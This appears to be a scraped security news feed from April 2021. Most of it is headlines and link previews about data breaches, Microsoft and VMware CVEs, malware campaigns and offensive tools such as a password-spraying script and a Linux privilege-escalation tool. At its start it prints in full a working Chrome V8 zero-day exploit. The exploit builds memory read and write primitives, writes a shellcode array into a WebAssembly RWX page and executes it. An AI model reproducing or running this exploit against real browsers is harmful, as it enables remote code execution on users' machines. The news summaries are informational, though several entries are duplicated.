cKure
■■■■■ Zero-Day exploit code for Chrome. https://github.com/r4j0x00/exploits/tree/master/chrome-0day
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) var wasm_mod = new WebAssembly.Module(wasm_code); var wasm_instance = new WebAssembly.Instance(wasm_mod); var f = wasm_instance.exports.main; var buf = new ArrayBuffer(8); var f64_buf = new Float64Array(buf); var u64_buf = new Uint32Array(buf); let buf2 = new ArrayBuffer(0x150); function ftoi(val) { f64_buf[0] = val; return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); } function itof(val) { u64_buf[0] = Number(val & 0xffffffffn); u64_buf[1] = Number(val >> 32n); return f64_buf[0]; } const _arr = new Uint32Array([2**31]); function foo(a) { var x = 1; x = (_arr[0] ^ 0) + 1; x = Math.abs(x); x -= 2147483647; x = Math.max(x, 0); x -= 1; if(x==-1) x = 0; var arr = new Array(x); arr.shift(); var cor = [1.1, 1.2, 1.3]; return [arr, cor]; } for(var i=0;i<0x3000;++i) foo(true); var x = foo(false); var arr = x[0]; var cor = x[1]; const idx = 6; arr[idx+10] = 0x4242; function addrof(k) { arr[idx+1] = k; return ftoi(cor[0]) & 0xffffffffn; } function fakeobj(k) { cor[0] = itof(k); return arr[idx+1]; } var float_array_map = ftoi(cor[3]); var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4]; var fake = fakeobj(addrof(arr2) + 0x20n); function arbread(addr) { if (addr % 2n == 0) { addr += 1n; } arr2[1] = itof((2n << 32n) + addr - 8n); return (fake[0]); } function arbwrite(addr, val) { if (addr % 2n == 0) { addr += 1n; } arr2[1] = itof((2n << 32n) + addr - 8n); fake[0] = itof(BigInt(val)); } function copy_shellcode(addr, shellcode) { let dataview = new DataView(buf2); let buf_addr = addrof(buf2); let backing_store_addr = buf_addr + 0x14n; arbwrite(backing_store_addr, addr); for (let i = 0; i < shellcode.length; i++) { dataview.setUint32(4*i, shellcode[i], true); } } var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n)); console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16)); var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; copy_shellcode(rwx_page_addr, shellcode); f();■□□□□ Apple and Google block official UK COVID-19 app update.
https://nakedsecurity.sophos.com/2021/04/12/apple-and-google-block-official-uk-covid-19-app-update/
https://nakedsecurity.sophos.com/2021/04/12/apple-and-google-block-official-uk-covid-19-app-update/
■■■□□ #DataLeak: There's Another Facebook Phone Number Database Online.
https://www.vice.com/en/article/qj8dj5/facebook-phone-number-data-breach-telegram-bot
https://www.vice.com/en/article/qj8dj5/facebook-phone-number-data-breach-telegram-bot
VICE
There's Another Facebook Phone Number Database Online
Analysis by Motherboard and a security researcher indicate the database is separate from the recently reported cache of 500 million accounts.
■■□□□ VMware SSRF CVE-2021-21975 PoC
Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.
https://youtu.be/faeTl8ZPs2s
Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.
https://youtu.be/faeTl8ZPs2s
cKure
■■■■■ Zero-Day exploit code for Chrome. https://github.com/r4j0x00/exploits/tree/master/chrome-0day
■■■□□ Google Chrome, Microsoft Edge zero-day vulnerability shared on Twitter.
https://www.bleepingcomputer.com/news/security/google-chrome-microsoft-edge-zero-day-vulnerability-shared-on-twitter/
https://www.bleepingcomputer.com/news/security/google-chrome-microsoft-edge-zero-day-vulnerability-shared-on-twitter/
BleepingComputer
Google Chrome, Microsoft Edge zero-day vulnerability shared on Twitter
A security researcher has dropped a zero-day remote code execution vulnerability on Twitter that works on the current version of Google Chrome and Microsoft Edge.
■■□□□ BRATA Malware Poses as Android Security Scanners on Google Play Store.
https://thehackernews.com/2021/04/brata-malware-poses-as-android-security.html
https://thehackernews.com/2021/04/brata-malware-poses-as-android-security.html
■■□□□ Britain 🇬🇧: Average British computer criminal is young, male and not highly skilled, researcher finds.
https://go.theregister.com/feed/www.theregister.com/2021/04/13/computer_misuse_act_convictions_analysis/
https://go.theregister.com/feed/www.theregister.com/2021/04/13/computer_misuse_act_convictions_analysis/
The Register
Average convicted British computer criminal is young, male, not highly skilled, researcher finds
Analysis of Computer Misuse Act cases also draws heavily on El Reg archives
■■□□□ ldsview: Search utility for LDAP directory dumps.
https://securityonline.info/ldsview-search-tool-for-ldap-directory-dumps/
https://securityonline.info/ldsview-search-tool-for-ldap-directory-dumps/
Daily CyberSecurity
Stay ahead with Daily CyberSecurity. We deliver rapid zero-hour alerts and expert analysis on critical vulnerabilities, CVEs, and emerging cyber threats.
■□□□□ #DataLeak: ParkMobile Breach Exposes License Plate Data, Mobile Numbers of 21M Users.
https://krebsonsecurity.com/2021/04/parkmobile-breach-exposes-license-plate-data-mobile-numbers-of-21m-users/
https://krebsonsecurity.com/2021/04/parkmobile-breach-exposes-license-plate-data-mobile-numbers-of-21m-users/
Krebs on Security
ParkMobile Breach Exposes License Plate Data, Mobile Numbers of 21M Users
Someone is selling account information for 21 million customers of ParkMobile, a mobile parking app that's popular in North America. The stolen data includes customer email addresses, phone numbers, license plate numbers, hashed passwords and mailing addresses.
■■■□□ PIN bruteforcing if lockout is not enabled | The software rubber duck.
https://www.instagram.com/reel/CNaBvcFgX1b/?igshid=u5csu09obux
https://www.instagram.com/reel/CNaBvcFgX1b/?igshid=u5csu09obux
■■□□□ Back in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service.
https://www.fireeye.com/blog/threat-research/2021/03/attacker-use-of-windows-background-intelligent-transfer-service.html
https://www.fireeye.com/blog/threat-research/2021/03/attacker-use-of-windows-background-intelligent-transfer-service.html
Google Cloud
Mandiant Cybersecurity Consulting
Transform cyber defense with Mandiant. Engage frontline experts for incident response, threat intelligence services, and cyber risk management.
■■■■□ Over 100,000 web pages hosted by Google for business form searches overrun with backdoor RATs.
eSentire warns of remote-access trojans masquerading as PDFs
https://go.theregister.com/feed/www.theregister.com/2021/04/14/google_sites_malware/
eSentire warns of remote-access trojans masquerading as PDFs
https://go.theregister.com/feed/www.theregister.com/2021/04/14/google_sites_malware/
The Register
Google Sites blight: Over 100,000 web pages for business form searches overrun with backdoor RATs
eSentire warns of remote-access trojans masquerading as PDFs
■■■■□ United States 🇺🇸: A court-approved FBI operation was conducted to remove web shells from compromised US-based Microsoft Exchange servers without first notifying the servers' owners.
https://www.bleepingcomputer.com/news/security/fbi-nuked-web-shells-from-hacked-exchange-servers-without-telling-owners/
https://www.bleepingcomputer.com/news/security/fbi-nuked-web-shells-from-hacked-exchange-servers-without-telling-owners/
BleepingComputer
FBI nuked web shells from hacked Exchange Servers without telling owners
A court-approved FBI operation was conducted to remove web shells from compromised US-based Microsoft Exchange servers without first notifying the servers' owners.
■■■■■ Microsoft today issued fixes for 114 vulnerabilities as part of its monthly security update release, which this month addressed 19 critical flaws, four critical Microsoft Exchange Server bugs found by the National Security Agency (NSA), and one zero-day bug in Desktop Window Manager.
CVE-2021-28310, a Win32k elevation of privilege vulnerability, is the only CVE under active attack patched this month.
Yesterday's patches also addressed four critical remote code execution vulnerabilities in Microsoft Exchange Server: CVE-2021-28480, CVE-2021-28481, CVE-2021-28482, and CVE-2021-28483. All of these were discovered by the NSA and affect Exchange Server versions 2013 through 2019.
CVE-2021-28480 and CVE-2021-28481 have a CVSS score of 9.8 and require no authorization or user interaction to exploit.
CVE-2021-28310, a Win32k elevation of privilege vulnerability, is the only CVE under active attack patched this month.
Yesterday's patches also addressed four critical remote code execution vulnerabilities in Microsoft Exchange Server: CVE-2021-28480, CVE-2021-28481, CVE-2021-28482, and CVE-2021-28483. All of these were discovered by the NSA and affect Exchange Server versions 2013 through 2019.
CVE-2021-28480 and CVE-2021-28481 have a CVSS score of 9.8 and require no authorization or user interaction to exploit.
■■■■□ Traitor - Automatic Linux Privesc Via Exploitation Of Low-Hanging Fruit E.G. GTFOBin
https://github.com/liamg/traitor
https://github.com/liamg/traitor
GitHub
GitHub - liamg/traitor: :arrow_up: :fire: Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins, pwnkit,…
:arrow_up: :skull_and_crossbones: :fire: Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins, pwnkit, dirty pipe, +w docker.sock - liamg/traitor
■□□□□ HackBar v2.0 release: HackBar plugin for Burpsuite.
https://github.com/d3vilbug/HackBar/releases
https://securityonline.info/hackbar-v2-0-releases-hackbar-plugin-for-burpsuite/
https://github.com/d3vilbug/HackBar/releases
https://securityonline.info/hackbar-v2-0-releases-hackbar-plugin-for-burpsuite/
GitHub
Releases · d3vilbug/HackBar
HackBar plugin for Burpsuite. Contribute to d3vilbug/HackBar development by creating an account on GitHub.
■■■■□ Adfsbrute - A Script To Test Credentials Against Active Directory Federation Services (ADFS), Allowing Password Spraying Or Bruteforce Attacks.
https://github.com/ricardojoserf/adfsbrute
https://github.com/ricardojoserf/adfsbrute
GitHub
GitHub - ricardojoserf/adfsbrute: A script to test credentials against Active Directory Federation Services (ADFS), allowing password…
A script to test credentials against Active Directory Federation Services (ADFS), allowing password spraying or bruteforce attacks. - ricardojoserf/adfsbrute
■■■■□ PoC / exploit utilities.
CVE-2020-6516 - Chrome
CVE-2021-24027 - WhatsApp
https://github.com/CENSUS/whatsapp-mitd-mitm
CVE-2020-6516 - Chrome
CVE-2021-24027 - WhatsApp
https://github.com/CENSUS/whatsapp-mitd-mitm
GitHub
GitHub - CENSUS/whatsapp-mitd-mitm: PoC and tools for exploiting CVE-2020-6516 (Chrome) and CVE-2021-24027 (WhatsApp)
PoC and tools for exploiting CVE-2020-6516 (Chrome) and CVE-2021-24027 (WhatsApp) - CENSUS/whatsapp-mitd-mitm
■■■■□ New JavaScript Exploit Can Now Carry Out DDR4 Rowhammer Attacks.
https://thehackernews.com/2021/04/new-javascript-exploit-can-now-carry.html
https://thehackernews.com/2021/04/new-javascript-exploit-can-now-carry.html